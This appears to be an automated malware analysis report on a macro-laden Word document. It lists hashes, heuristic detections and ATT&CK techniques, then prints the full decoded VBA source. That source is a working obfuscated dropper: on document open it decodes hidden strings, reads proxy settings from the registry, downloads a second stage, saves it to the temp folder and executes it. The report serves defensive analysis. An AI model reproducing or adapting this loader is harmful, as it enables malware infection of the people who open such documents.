Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 89ad27da0a3c757b…

MALICIOUS

Office (OLE)

53.0 KB Created: 2017-09-30 18:54:00 Authoring application: Microsoft Office Word First seen: 2018-02-19
MD5: 44741fa524e169dd6552f34d9e23f18a SHA-1: 3da1226612457f31b18983f856d5d0c6896431c5 SHA-256: 89ad27da0a3c757bab2f48831e5567dc36b868814a9dc4516e3a9c231402ac39
350 Risk Score

Malware Insights

MITRE ATT&CK
T1566.001 Spearphishing Attachment T1059.005 Visual Basic T1140 Deobfuscate/Decode Files or Information T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The macros are obfuscated and designed to download and execute a second-stage payload. The document body acts as a lure, instructing the user to enable content to view a 'secured statement', which is a common social engineering tactic.

Heuristics 10

  • ClamAV: Doc.Dropper.Agent-6450723-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6450723-0
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC
    VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.
    Matched line in script
    QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody
  • Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER
    Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
    Matched line in script
    Set SdwxfJogqxDZnMqfnPrxqLZpQ = GetObject("",WILscVlpxI ( Array ( 29,26,52,6,67,19,6,42,4,91,14,20,33,94,38,62 ), 0 ));
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set xdmZMJEIHblAmhMlmTgeKxZdN = CreateObject(WILscVlpxI(Array(29, 38, 37, 16, 4, 34, 2, 116, 59, 90, 8, 25, 57), 0))
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set SdwxfJogqxDZnMqfnPrxqLZpQ = GetObject("",WILscVlpxI ( Array ( 29,26,52,6,67,19,6,42,4,91,14,20,33,94,38,62 ), 0 ));
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
  • Macro/content-enable lure medium SE_ENABLE_LURE
    Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11236 bytes
SHA-256: f32792a71a41da81f27b6b9598928f07d45c3c9542e54c64672e81ba35528543
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
If ActiveDocument.Variables("xzgWcL").Value <> "yolo" Then
HRqctLfjTbTwCtKsgAgohlQgB
ActiveDocument.Variables("xzgWcL").Value = "yolo"
If ActiveDocument.ReadOnly = False Then
ActiveDocument.Save
End If
End If
End Sub


Attribute VB_Name = "MCpzOyf"
Private Function WILscVlpxI(GBUdWSunwT As Variant, CEGeluZwxj As Integer)
Dim DktqmEUisZ, vbgqoDblCa As String, XopsfCkPPJ, BCHLqtnCAT
vbgqoDblCa = ActiveDocument.Variables("xzgWcL").Value()
DktqmEUisZ = ""
XopsfCkPPJ = 1
While XopsfCkPPJ < UBound(GBUdWSunwT) + 2
BCHLqtnCAT = XopsfCkPPJ Mod Len(vbgqoDblCa): If BCHLqtnCAT = 0 Then BCHLqtnCAT = Len(vbgqoDblCa)
DktqmEUisZ = DktqmEUisZ + Chr(Asc(Mid(vbgqoDblCa, BCHLqtnCAT + CEGeluZwxj, 1)) Xor CInt(GBUdWSunwT(XopsfCkPPJ - 1)))
XopsfCkPPJ = XopsfCkPPJ + 1
Wend
WILscVlpxI = DktqmEUisZ
End Function
Function yrrfcAvvsLhikizcvNWLbXjQV(GkRqfLebpwCKEHZPqBjoXZQio, MnCIFQwwfRfkzUvXnWtfjBtDO)
zHrtJfKSnmHYOydBmsMBZTDNu = GkRqfLebpwCKEHZPqBjoXZQio.Items
For rgBqyftvflyaeZYljsfSqamik = 0 To GkRqfLebpwCKEHZPqBjoXZQio.Count - 1
If zHrtJfKSnmHYOydBmsMBZTDNu(rgBqyftvflyaeZYljsfSqamik) = MnCIFQwwfRfkzUvXnWtfjBtDO Then
yrrfcAvvsLhikizcvNWLbXjQV = True
Exit For
End If
Next
yrrfcAvvsLhikizcvNWLbXjQV = False
End Function
Sub wfUgOueOpWMXKYXFhjXBpOzoV()
Dim SdwxfJogqxDZnMqfnPrxqLZpQ, nUfWhwToWNGWHKGBBqAxfLPuR, RzXmqMiPXzCLXgQSuIkgDlqzH
Set SdwxfJogqxDZnMqfnPrxqLZpQ = GetObject("",WILscVlpxI ( Array ( 29,26,52,6,67,19,6,42,4,91,14,20,33,94,38,62 ), 0 ));
SdwxfJogqxDZnMqfnPrxqLZpQ.Visible = true;
SdwxfJogqxDZnMqfnPrxqLZpQ.ScreenUpdating = false;
nUfWhwToWNGWHKGBBqAxfLPuR = SdwxfJogqxDZnMqfnPrxqLZpQ.ActiveDocument;
nUfWhwToWNGWHKGBBqAxfLPuR.Content.Select();
SdwxfJogqxDZnMqfnPrxqLZpQ.Selection.Delete();
RzXmqMiPXzCLXgQSuIkgDlqzH = nUfWhwToWNGWHKGBBqAxfLPuR.Range();
RzXmqMiPXzCLXgQSuIkgDlqzH.InsertAfter(WILscVlpxI ( Array ( 30,49,102,32,12,60,29,122,10,83,3,30,60,89,46,112,57,1,39,22,8, _
63,19,52,28,18,9,16,54,69,48,32,62,28,41,12,77,52,23,51,4, _
71,31,16,116,23,25,60,47,20,53,7,77,62,25,61,1,92,77,26,59, _
91,32,62,47,85,50,13,77,36,31,63,31,18,20,26,32,69,105,50,43, _
27,45,66,30,38,23,46,13,95,8,27,33,25 ), 0 ));
RzXmqMiPXzCLXgQSuIkgDlqzH.InsertParagraphAfter();
SdwxfJogqxDZnMqfnPrxqLZpQ.ScreenUpdating = true;
End Sub
Dim iaaifASUlvDfoMYNvPJZNRHOn
Sub nfyjLNjcfrUcnXnxJrkEJSAkx()
Dim xdmZMJEIHblAmhMlmTgeKxZdN
Set xdmZMJEIHblAmhMlmTgeKxZdN = CreateObject(WILscVlpxI(Array(29, 38, 37, 16, 4, 34, 2, 116, 59, 90, 8, 25, 57), 0))
Set zzUpNiOKOhEAExeDcJHfncbZP = CreateObject(WILscVlpxI(Array(25, 22, 52, 11, 29, 38, 31, 52, 15, 28, 41, 28, 54, 67, 32, 63, 36, 20, 52, 27), 0))
Dim vLKhlAZRdIzuqELwePBHbLufu: vLKhlAZRdIzuqELwePBHbLufu = 0
Dim qiDHYiFVnaMaRwPUMvyYvjmYE: qiDHYiFVnaMaRwPUMvyYvjmYE = ""
Dim GGWrUAEZxRSohZWWrNkILpvIB: GGWrUAEZxRSohZWWrNkILpvIB = ""
On Error Resume Next
qiDHYiFVnaMaRwPUMvyYvjmYE = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(2, 62, 3, 59, 50, 17, 35, 8, 58, 119, 35, 33, 10, 98, 26, 21, 24, 41, 21, 13, 11, _
38, 1, 59, 26, 87, 49, 56, 60, 84, 59, 63, 57, 26, 32, 22, 49, 5, 31, 52, 12, _
93, 26, 6, 9, 116, 60, 34, 56, 16, 40, 22, 59, 55, 4, 41, 1, 93, 3, 41, 28, _
89, 61, 53, 56, 27, 35, 22, 77, 1, 19, 46, 28, 91, 3, 18, 38, 107, 56, 57, 14, _
61, 31, 11, 43, 4, 24, 59, 37, 83, 63, 2, 5, 98, 4, 38, 51, 44, 48, 8, 0, _
11, 51), 0))
If qiDHYiFVnaMaRwPUMvyYvjmYE = WILscVlpxI(Array(123), 0) Then
GGWrUAEZxRSohZWWrNkILpvIB = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(2, 62, 3, 59, 50, 17, 35, 8, 58, 119, 35, 33, 10, 98, 26, 21, 24, 41, 21, 13, 11, _
38, 1, 59, 26, 87, 49, 56, 60, 84, 59, 63, 57, 26, 32, 22, 49, 5, 31, 52, 12, _
93, 26, 6, 9, 116, 60, 34, 56, 16, 40, 22, 59, 55, 4, 41, 1, 93, 3, 41, 28, _
89, 61, 53, 56, 27, 35, 22, 77, 1, 19, 46, 28, 91, 3, 18, 38, 107, 14, 23, 29, _
7, 19, 35, 40, 8, 14, 8, 59, 93, 5, 47, 2, 96, 59, 30, 33, 60, 10, 18, 27, _
27, 52), 0))
vLKhlAZRdIzuqELwePBHbLufu = vLKhlAZRdIzuqELwePBHbLufu + 1
zzUpNiOKOhEAExeDcJHfncbZP.Add vLKhlAZRdIzuqELwePBHbLufu, GGWrUAEZxRSohZWWrNkILpvIB
End If
If Err.Number <> 0 Then
Err.Clear
End If
Const yctJETKzINXOoVgfzwuQUhkIo = &H80000003
UNILLuMraBAIaQdlUmDHrlxcG = WILscVlpxI(Array(100), 0)
Set LGHTXYjWeaXqfihITVoFzCUTN = GetObject(WILscVlpxI(Array(61, 28, 40, 15, 10, 63, 2, 41, 82, 73, 4, 24, 37, 82, 59, 35, 37, 27, 39, 22, 4, _
61, 24, 22, 13, 68, 8, 25, 104, 94, 36, 32, 47, 7, 53, 13, 3, 51, 2, 63, 21, _
19, 49, 41), 0) _
& UNILLuMraBAIaQdlUmDHrlxcG & WILscVlpxI(Array(22, 7, 41, 13, 25, 14, 18, 63, 14, 83, 24, 25, 33, 13, 26, 36, 46, 39, 35, 5, 61, _
32, 25, 44), 0))
fKiXyjiDjohhffNjcsfHgqYch = ""
LGHTXYjWeaXqfihITVoFzCUTN.EnumKey yctJETKzINXOoVgfzwuQUhkIo, fKiXyjiDjohhffNjcsfHgqYch, YLzPZYDBtEBlkwJPqvnkdJovx
For Each udJCuiOpwxMOKWQmUlVViFijQ In YLzPZYDBtEBlkwJPqvnkdJovx
qiDHYiFVnaMaRwPUMvyYvjmYE = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(51, 22, 50, 40, 40, 6, 61, 32, 33, 124, 53, 58, 58, 97, 46, 54, 48, 2, 51, 51, 56, _
58, 29, 19, 7, 110), 0) & udJCuiOpwxMOKWQmUlVViFijQ & WILscVlpxI(Array(22, 38, 41, 4, 25, 37, 23, 40, 13, 110, 32, 28, 54, 69, 38, 35, 37, 19, 50, 62, 58, _
59, 24, 62, 7, 69, 30, 41, 22, 66, 59, 34, 47, 27, 50, 52, 8, 32, 5, 51, 7, _
92, 49, 60, 59, 67, 44, 34, 36, 16, 50, 66, 62, 55, 2, 46, 1, 92, 10, 6, 9, _
70, 32, 20, 2, 44, 47, 36, 59, 60, 23, 23, 9, 96, 26, 37, 0, 122, 63, 41, 19, _
3, 44, 15, 52, 23), 0))
If qiDHYiFVnaMaRwPUMvyYvjmYE = WILscVlpxI(Array(123), 0) Then
GGWrUAEZxRSohZWWrNkILpvIB = xdmZMJEIHblAmhMlmTgeKxZdN.RegRead(WILscVlpxI(Array(51, 22, 50, 40, 40, 6, 61, 32, 33, 124, 53, 58, 58, 97, 46, 54, 48, 2, 51, 51, 56, _
58, 29, 19, 7, 110), 0) & udJCuiOpwxMOKWQmUlVViFijQ & WILscVlpxI(Array(22, 38, 41, 4, 25, 37, 23, 40, 13, 110, 32, 28, 54, 69, 38, 35, 37, 19, 50, 62, 58, _
59, 24, 62, 7, 69, 30, 41, 22, 66, 59, 34, 47, 27, 50, 52, 8, 32, 5, 51, 7, _
92, 49, 60, 59, 67, 44, 34, 36, 16, 50, 66, 62, 55, 2, 46, 1, 92, 10, 6, 9, _
112, 14, 7, 56, 32, 7, 39, 55, 42, 36, 9, 7, 90, 55, 34, 2, 69, 7, 59, 3, _
57, 54, 20, 36, 16), 0))
If Not yrrfcAvvsLhikizcvNWLbXjQV(zzUpNiOKOhEAExeDcJHfncbZP, GGWrUAEZxRSohZWWrNkILpvIB) Then
vLKhlAZRdIzuqELwePBHbLufu = vLKhlAZRdIzuqELwePBHbLufu + 1
zzUpNiOKOhEAExeDcJHfncbZP.Add vLKhlAZRdIzuqELwePBHbLufu, GGWrUAEZxRSohZWWrNkILpvIB
End If
End If
If Err.Number <> 0 Then
Err.Clear
End If
Next
Set iaaifASUlvDfoMYNvPJZNRHOn = zzUpNiOKOhEAExeDcJHfncbZP
Set xdmZMJEIHblAmhMlmTgeKxZdN = Nothing
End Sub
Function QYQoJeddlLpwrmfgXNywuwFJz(RSFzoMSeLkAiKUVxHeKSnYEAg, aTReKvJkCtkJbhiwEQzDwkHpm, WHOQmShJETnHXOyYUAUXZxmlZ, LQjpqIgEwXcoacqwpirLCXMTk)
On Error Resume Next
Dim pyFrJImztQXCpkmobObAeBFaq
Set pyFrJImztQXCpkmobObAeBFaq = CreateObject(WILscVlpxI(Array(7, 6, 62, 15, 1, 96, 88, 9, 13, 64, 27, 16, 39, 111, 4, 28, 2, 33, 18, 50, 67, _
100, 88, 106), 0))
If Err.Number <> 0 Then
QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody
Set pyFrJImztQXCpkmobObAeBFaq = Nothing
Err.Clear
Exit Function
End If
Dim JNhvtobwDQskQYGISbAHHtnMY: JNhvtobwDQskQYGISbAHHtnMY = 0
Do While JNhvtobwDQskQYGISbAHHtnMY < UBound(WHOQmShJETnHXOyYUAUXZxmlZ)
Err.Clear
zHrtJfKSnmHYOydBmsMBZTDNu = iaaifASUlvDfoMYNvPJZNRHOn.Items
For BXNFOEwniVJibLGVsWxLngkoz = -1 To iaaifASUlvDfoMYNvPJZNRHOn.Count - 1
Err.Clear
qSFJAjrDXWJtABUMOVvOMHrHI = WHOQmShJETnHXOyYUAUXZxmlZ(JNhvtobwDQskQYGISbAHHtnMY) & LQjpqIgEwXcoacqwpirLCXMTk
pyFrJImztQXCpkmobObAeBFaq.setOption 2, 13056
pyFrJImztQXCpkmobObAeBFaq.setTimeouts 0, 0, 0, 0
pyFrJImztQXCpkmobObAeBFaq.Open RSFzoMSeLkAiKUVxHeKSnYEAg, qSFJAjrDXWJtABUMOVvOMHrHI, False
If BXNFOEwniVJibLGVsWxLngkoz <> -1 Then
pyFrJImztQXCpkmobObAeBFaq.setProxy 2, zHrtJfKSnmHYOydBmsMBZTDNu(BXNFOEwniVJibLGVsWxLngkoz), ""
End If
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(9, 29, 39, 16, 30, 55, 2), 0), WILscVlpxI(Array(63, 1, 32, 79, 85), 0)
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(9, 26, 40, 12, 8, 49, 2, 51, 7, 92), 0), WILscVlpxI(Array(1, 16, 35, 18, 64, 19, 26, 51, 30, 87), 0)
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(1, 16, 35, 18, 64, 19, 26, 51, 30, 87), 0), WILscVlpxI(Array(121, 69, 118), 0)
pyFrJImztQXCpkmobObAeBFaq.setRequestHeader WILscVlpxI(Array(9, 26, 40, 22, 8, 60, 2, 119, 60, 75, 29, 16), 0), WILscVlpxI(Array(43, 5, 54, 14, 4, 49, 23, 46, 1, 93, 3, 90, 45, 26, 62, 39, 61, 88, 32, 13, 31, _
63, 91, 47, 26, 94, 8, 27, 54, 88, 45, 53, 46), 0)
pyFrJImztQXCpkmobObAeBFaq.Send (aTReKvJkCtkJbhiwEQzDwkHpm)
If pyFrJImztQXCpkmobObAeBFaq.ReadyState <> 4 Then
pyFrJImztQXCpkmobObAeBFaq.WaitForResponse 30
End If
If Err.Number = 0 Then
If pyFrJImztQXCpkmobObAeBFaq.Status = 200 Then
If pyFrJImztQXCpkmobObAeBFaq.StatusText = WILscVlpxI(Array(5, 62), 0) Then
QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody
Exit Function
End If
End If
End If
Next
JNhvtobwDQskQYGISbAHHtnMY = JNhvtobwDQskQYGISbAHHtnMY + 1
Loop
QYQoJeddlLpwrmfgXNywuwFJz = pyFrJImztQXCpkmobObAeBFaq.ResponseBody
Set pyFrJImztQXCpkmobObAeBFaq = Nothing
End Function
Sub WJFDCHouLHjDlYHVoUxzpfGLe(WXKqccFQlDQrAmzrMJFbZzGIY, fCZGpshBigvPgWLBEBcBYyNfc)
Set ZoVmbcuaCaEbYvmbhpEuTkRXG = CreateObject(WILscVlpxI(Array(11, 49, 9, 38, 47, 124, 37, 46, 26, 87, 12, 24), 0))
ZoVmbcuaCaEbYvmbhpEuTkRXG.Open
ZoVmbcuaCaEbYvmbhpEuTkRXG.Type = 1
If IsEmpty(WXKqccFQlDQrAmzrMJFbZzGIY) Then
ZoVmbcuaCaEbYvmbhpEuTkRXG.Close
Set ZoVmbcuaCaEbYvmbhpEuTkRXG = Nothing
Exit Sub
End If
ZoVmbcuaCaEbYvmbhpEuTkRXG.Write WXKqccFQlDQrAmzrMJFbZzGIY
ZoVmbcuaCaEbYvmbhpEuTkRXG.Position = 0
ZoVmbcuaCaEbYvmbhpEuTkRXG.SaveToFile fCZGpshBigvPgWLBEBcBYyNfc
ZoVmbcuaCaEbYvmbhpEuTkRXG.Close
Set ZoVmbcuaCaEbYvmbhpEuTkRXG = Nothing
End Sub
Sub HRqctLfjTbTwCtKsgAgohlQgB()
On Error Resume Next
Dim iRPslDHhWjtCYtIGiHSZrAkjr(), BDVPOXaXBxMcvsDsQzGgcDhkC, eAbYltzpuopIzFFBAiyBvmzEd, ZoLJdYNEWvtvRXjVrkVIXDxdP
ReDim iRPslDHhWjtCYtIGiHSZrAkjr(1)
nfyjLNjcfrUcnXnxJrkEJSAkx
Set eAbYltzpuopIzFFBAiyBvmzEd = CreateObject(WILscVlpxI(Array(29, 38, 37, 16, 4, 34, 2, 116, 59, 90, 8, 25, 57), 0))
Set ZoLJdYNEWvtvRXjVrkVIXDxdP = CreateObject(WILscVlpxI(Array(25, 22, 52, 11, 29, 38, 31, 52, 15, 28, 43, 28, 57, 82, 26, 41, 57, 1, 35, 15, 34, _
48, 28, 63, 11, 70), 0)).GetSpecialFolder(2)
BDVPOXaXBxMcvsDsQzGgcDhkC = WILscVlpxI(Array(51, 26, 42, 13, 67, 55, 14, 63), 0)
ZoLJdYNEWvtvRXjVrkVIXDxdP = ZoLJdYNEWvtvRXjVrkVIXDxdP & WILscVlpxI(Array(22), 0) & BDVPOXaXBxMcvsDsQzGgcDhkC
iRPslDHhWjtCYtIGiHSZrAkjr(0) = WILscVlpxI(Array(34, 1, 50, 18, 87, 125, 89, 45, 31, 69, 67, 24, 52, 84, 59, 63, 57, 26, 32, 22, 67, _
53, 7, 117), 0)
KDOiBQRVGGPUnqEFjygmVYhRl = QYQoJeddlLpwrmfgXNywuwFJz(WILscVlpxI(Array(13, 48, 18), 0), "", iRPslDHhWjtCYtIGiHSZrAkjr, WILscVlpxI(Array(48, 90, 36, 13, 25, 124, 19, 34, 13), 0))
WJFDCHouLHjDlYHVoUxzpfGLe KDOiBQRVGGPUnqEFjygmVYhRl, ZoLJdYNEWvtvRXjVrkVIXDxdP
eAbYltzpuopIzFFBAiyBvmzEd.Run (ZoLJdYNEWvtvRXjVrkVIXDxdP)
wfUgOueOpWMXKYXFhjXBpOzoV
End Sub